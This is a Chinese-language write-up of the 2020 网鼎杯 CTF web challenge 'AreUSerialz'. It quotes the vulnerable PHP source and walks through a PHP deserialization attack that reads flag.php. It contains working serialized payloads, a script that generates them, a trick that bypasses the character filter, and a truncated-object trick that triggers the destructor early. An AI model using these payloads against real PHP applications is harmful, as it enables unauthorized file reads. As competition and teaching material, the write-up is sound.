2020年 网鼎杯 WEB AreUSerialz WriteUp

Tips:

2020年网鼎杯 WEB题

等了一早上 大中午了 才出一个WEB题 搞得挺迷的

这题是一个反序列化题 然后被打成了签到题..估计exp满天飞

先看显示的源码

<?php
include("flag.php");
highlight_file(__FILE__);

class FileHandler {
    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }
    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }
    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }
    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }
    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }
    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}
if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

先来分析源码 得到字符串 通过GET传入str参数 用is_valid函数进行一次检测
限制ASCII码在32-125之间的
顺便看到一个read函数 思路 用read去读flag.php文件 read函数执行调用一次 _destruct()魔术方法
_destruct()会检测op值是否为"2" 如果是"2"就会让op=1

注意: 这里是if($this->op === "2") === 要求数值和类型都等于2

process中的比较为 else if($this->op == "2") 使用弱类型绕过

构建一个php序列化的源码

<?php

class FileHandler {
    public $op = 2;
    public $filename = "flag.php";
    protected $content;
}

$moe=new FileHandler();
print (serialize($moe));

得到序列化

?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:10:"*content";N;}

在执行反序列化时 is_valid($s) 进行了判断 需要咱们绕过一下 可以使用 \00*\00 或/00*/00

得到

?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:10:"/00*/00content";N;}

这是后期复现环境..使用Apache和php7.3 但是比赛中无法使用这个exp得到flag

分析得知 需要使用绝对路径进行进行读取 通过 各种配置文件读路径配置 得到路径 /web/html/

最终exp

?str=O:11:"FileHandler":2:{s:2:"op";i:2;s:8:"filename";s:18:"/web/html/flag.php";}

第二种方法 使用不完整的反序列化让析构函数提前执行 就可以读当前目录的flag.php 使用方法去掉最后的大括号

?str=O:11:"FileHandler":2:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php"; //两种方法都可以
?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;

也可以得到Flag

总结

web等到中午才出题..上来就是反序列化

进去Docker错误都习惯了 重新下发 后面发现这题都被打成筛子了

群里都有人公开了web1的exp

 

发表评论

电子邮件地址不会被公开。必填项已用 * 标注